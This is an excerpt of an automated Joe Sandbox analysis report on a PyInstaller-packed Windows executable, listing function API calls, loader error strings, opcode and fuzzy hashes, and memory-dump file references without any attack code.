                                                                                                                                                            • Opcode Fuzzy Hash: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                                                                                                                            • Instruction Fuzzy Hash: 1BD19D32E1CB4286EB209B6595402AD77A0FF4579CF100137EE8D97B9ADF39E4A1C740
APIs
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E98A47
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E98A9E
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
• API String ID: 626452242-27947307
APIs
• WideCharToMultiByte.KERNEL32(?,00007FF6D6E939CA), ref: 00007FF6D6E98F31
  • Part of subcall function 00007FF6D6E929C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
  • Part of subcall function 00007FF6D6E929C0: MessageBoxW.USER32 ref: 00007FF6D6E92AD0
• WideCharToMultiByte.KERNEL32(?,00007FF6D6E939CA), ref: 00007FF6D6E98FA5
Strings
Similarity
• API ID: ByteCharMultiWide$ErrorLastMessage
• String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
• API String ID: 3723044601-27947307
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo$_fread_nolock
• String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
• API String ID: 3231891352-3501660386
APIs
  • Part of subcall function 00007FF6D6E98DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
• ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6D6E97BB1,00000000,?,00000000,00000000,?,00007FF6D6E9153F), ref: 00007FF6D6E9768F
  • Part of subcall function 00007FF6D6E92B10: MessageBoxW.USER32 ref: 00007FF6D6E92BE5
Strings
• LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6D6E976EA
• LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6D6E976A3
• LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6D6E97666
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
• API String ID: 1662231829-3498232454
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E44D
• GetLastError.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E45B
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E485
• FreeLibrary.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E4F3
• GetProcAddress.KERNEL32(?,?,?,00007FF6D6E9E67A,?,?,?,00007FF6D6E9D5AC,?,?,?,00007FF6D6E9D1A1), ref: 00007FF6D6E9E4FF
Strings
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
APIs
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
  • Part of subcall function 00007FF6D6E929C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
  • Part of subcall function 00007FF6D6E929C0: MessageBoxW.USER32 ref: 00007FF6D6E92AD0
• MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98EA0
Strings
Similarity
• API ID: ByteCharMultiWide$ErrorLastMessage
• String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
• API String ID: 3723044601-876015163
APIs
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
                                                                                                                                                            • Instruction ID: 55dd0125a183ee777d5bed2fea0eb309d80046133949926142f9a4804e4a1043
                                                                                                                                                            • Opcode Fuzzy Hash: df2ded1ae2d12cacab90ddcd018bee7069951accd7a28f59ea2aa6442bb7c29d
                                                                                                                                                            • Instruction Fuzzy Hash: 12218128F0D24241FA6967359A51A7DA1725F447B0F28473BE87EC76DADE2EB4708B00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                            • Opcode ID: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                                                                                            • Instruction ID: 927f6c542bcc611b03d931b19836263dc79027bf90fd7826b43dbdc252470c65
                                                                                                                                                            • Opcode Fuzzy Hash: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                                                                                            • Instruction Fuzzy Hash: 96118E21F1CB4186E3508B06E85472DA6A0FB88FE4F040236EA5EC77A4DF3DD964C744
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC087
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC0BD
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC0EA
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC0FB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC10C
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6D6EA5CBD,?,?,?,?,00007FF6D6EAF9AF,?,?,00000000,00007FF6D6EAC196,?,?,?), ref: 00007FF6D6EAC127
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
                                                                                                                                                            • Instruction ID: 596405fd24845e85bf1f57cf2b70305ad3b17008357abc6824267c1326c4c1d0
                                                                                                                                                            • Opcode Fuzzy Hash: da8c6ca16c8b883ebc71625bfe0f28af63b483cac13b62078f3c5bdeda11927e
                                                                                                                                                            • Instruction Fuzzy Hash: DA11D220F0C34242FA559325A69197DA1B28F44BB0F140737E87EC77C6EF3EA4619700
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                            • Opcode ID: 7306380fa00786dd34543e50636d1eb829ac66d68af8c251f6b6aa16652876a0
                                                                                                                                                            • Instruction ID: a20cebac78183d61e59a2cd516c9fba5d85a01e232b511e21ffaffc4f21ad57b
                                                                                                                                                            • Opcode Fuzzy Hash: 7306380fa00786dd34543e50636d1eb829ac66d68af8c251f6b6aa16652876a0
                                                                                                                                                            • Instruction Fuzzy Hash: 01316D76A0DA8288EB20DB25E8551FD7360FF88B88F444137EA4D87A9ADF3DD110C700
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6D6E98AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E929F4
                                                                                                                                                              • Part of subcall function 00007FF6D6E98770: GetLastError.KERNEL32(00000000,00007FF6D6E92A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6E9101D), ref: 00007FF6D6E98797
                                                                                                                                                              • Part of subcall function 00007FF6D6E98770: FormatMessageW.KERNEL32 ref: 00007FF6D6E987C6
                                                                                                                                                              • Part of subcall function 00007FF6D6E98DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF6D6E92AD0
                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF6D6E92AEC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                            • Opcode ID: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                                                                                            • Instruction ID: 7bb031d9a8e43c0cca8c6a3a982c0b6409f8fbbc574b2881912d861f9fe43dae
                                                                                                                                                            • Opcode Fuzzy Hash: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                                                                                            • Instruction Fuzzy Hash: CC316272A2CA8281E730DB14E4516EE6364FF84BC8F804137E68D87A99DF3DD655CB40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                                                                                            • Instruction ID: 1e188d67f363329b19ef80fbf39a502840a8fcd53a50ac742fe30c041d58b94b
                                                                                                                                                            • Opcode Fuzzy Hash: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                                                                                            • Instruction Fuzzy Hash: 3FF06261F0DB4281FB248B29E44977D6370AF48B61F54063BD66E862F4CF2ED059D700
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                            • Instruction ID: 96fe47619872385ebb560718ae11e4221e018e5e2cae59f90d4e6ae85bb83ace
                                                                                                                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                            • Instruction Fuzzy Hash: 0D117322E1CB1701FE54156FE48E37D2141EF55370F140637E97E866EBCE2EA8624144
                                                                                                                                                            APIs
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC15F
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC17E
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC1A6
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC1B7
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6D6EAB35B,?,?,00000000,00007FF6D6EAB5F6,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAC1C8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                                                                                                                            • Instruction ID: b0eec30fb4f519d56de71aaae0b5865839e8af686a8999c0cf4a1c3f1aac067c
                                                                                                                                                            • Opcode Fuzzy Hash: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                                                                                                                            • Instruction Fuzzy Hash: 96118E60F0C24201FA59A326A941ABDA1725F54BB0F184337E87EC77C6DE2EE4659700
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                            • Opcode ID: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                                                                                                                            • Instruction ID: acfd8a31f09985b97e34a19ecda9c6dab747394abf28a897db40db869412c463
                                                                                                                                                            • Opcode Fuzzy Hash: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                                                                                                                            • Instruction Fuzzy Hash: D6110990E0C20741FA6A67369891ABD51B24F45B74F28073BD87ECB2D3EE3FB4619610
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: verbose
                                                                                                                                                            • API String ID: 3215553584-579935070
                                                                                                                                                            • Opcode ID: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                                                                                                                            • Instruction ID: 704ad1f6e496a94bf7e5bf6b51d015f35a94b7674b90742414b9ca6657c354f3
                                                                                                                                                            • Opcode Fuzzy Hash: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                                                                                                                            • Instruction Fuzzy Hash: 6991EE32E4CA4681FB209E24D450B7D37B1EB42B94F448233EA5D8B3D9DE3EE8258340
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                            • Opcode ID: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                                                                                                                            • Instruction ID: df47637348c72274c94b20ede1262ab5cdf228e7a9b54ef1405decb0746ec01e
                                                                                                                                                            • Opcode Fuzzy Hash: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                                                                                                                            • Instruction Fuzzy Hash: EB817E32E0C74285FA769E2DD15027C3AA0AB11B88F558037CA0ADB695DF3FF9219B51
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm
                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                            • Opcode ID: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                                                                                                                            • Instruction ID: 32ae457adc35bb6c9eef4a654efb200a953e4c09a7c8472297b55bc36b2570be
                                                                                                                                                            • Opcode Fuzzy Hash: 81dbbe3a269521ccb6618414f5b7d9ba6a400a48ab9a514a04d3b64c82b69e43
                                                                                                                                                            • Instruction Fuzzy Hash: 3F519022F1DA128ADB14DF16E44467D6392EF45B9CF508133DA4A87788EF7EE869C700
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
